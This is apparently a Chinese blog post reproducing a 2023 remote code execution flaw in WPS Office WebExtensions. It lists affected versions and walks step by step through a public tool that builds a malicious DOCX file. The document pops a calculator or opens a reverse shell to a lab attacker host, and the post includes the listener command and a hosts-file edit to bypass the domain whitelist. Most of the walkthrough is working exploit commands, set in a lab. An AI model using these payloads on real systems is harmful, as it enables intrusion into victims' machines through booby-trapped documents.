2023HVV|WPS Office 远程代码执行漏洞(RCE)

目录

一、漏洞描述

二、漏洞环境/测绘指纹

三、漏洞复现

前期准备

1.环境

2.工具使用

3.制作payload

4.靶机上修改好host文件

测试弹出计算机

测试反弹shell


一、漏洞描述

Office中的WebExtension(通常称为Office插件或Office应用程序) 是一种用于扩展Microsoft Office功能的技术。Office插件使第三方开发者能够在Office应用程序中集成自己的服务和功能。这些插件采用跨平台的Web技术(如HTML,CSS和JavaScript)开发,可以在不同的平台和设备上运行。

简单理解就是Office内置了一个浏览器,可以解析html/javascript/css代码,本次的漏洞,就是WPS在处理WebExtension时,未能正确的处理javascript代码,造成了溢出RCE(可参考之前Chrome被曝出的RCE漏洞、微信Windows版<3.1.2.141存在RCE漏洞,较为类似)

二、漏洞环境/测绘指纹

  1. WPS Office 2023个人版 < 11.1.0.15120
  2. WPS Office 2019企业版 < 11.8.2.12085

三、漏洞复现

靶机下载漏洞环境包:
https://official-package.wpscdn.cn/wps/download/WPS_Setup_12300.exe

前期准备

1.环境

攻击机 : kali: 192.168.137.128

靶机: win10: 192.168.137.129

2.工具使用

将doc生成工具放置到攻击机上并运行

​
git clone https://github.com/ba0gu0/wps_rce 

​

或下载拖入后解压

解压后进入

  • 安装对应的依赖
  • 程序需要使用python3.8以上的版本才能够正常运行。
  • 程序只在Mac/Linux上进行了测试,Windows上运行出现问题,不再进行解答(自行找Linux虚拟机测试)。
cd wps-rce-main

pip install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

cd wps-rce-main/server

python3 main.py

访问攻击机的80端口如下

3.制作payload

① 弹出计算器的payload

cd wps-rce-main/client/

将正常的a.docx文件上传至当前目录下

python3 main.py a.docx http://clientweb.docer.wps.cn.hackwps.cn/calc

会在当前目录下生成另一个DOCX文档

将生成的文档放置到靶机上准备

4.靶机上修改好host文件

(1)文件位置C:\Windows\System32\drivers\etc

(2)在文件最后一行添加:192.168.137.128 clientweb.docer.wps.cn.hackwps.cn(域名可改目的是为了绕过白名单限制)

测试弹出计算机

在靶机上打开上述生成的DOCX文档,即可弹出计算器

测试反弹shell

① 与弹出计算器的payload生成方式一样

访问攻击机的80端口

将正常的a.docx文件上传至当前目录后 ,制作payload

python3 main.py a.docx http://clientweb.docer.wps.cn.hackwps.cn/shell/192.168.137.128/9000

会在当前目录下生成另一个DOCX文档

② 攻击机上nc - lnvp 9000

③ 在靶机上打开上述生成的DOCX文档

踩坑记录

1.windows设置host文件时,IP地址填错,排查时一直没留意看细节,导致访问不到。

2.wps版本此次所用为12300,多次尝试后发现因下载问题,测试时总是自动用其他版本wps打开,导致有时能弹,有时不能。设置用规定版本wps打开world后均成功。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值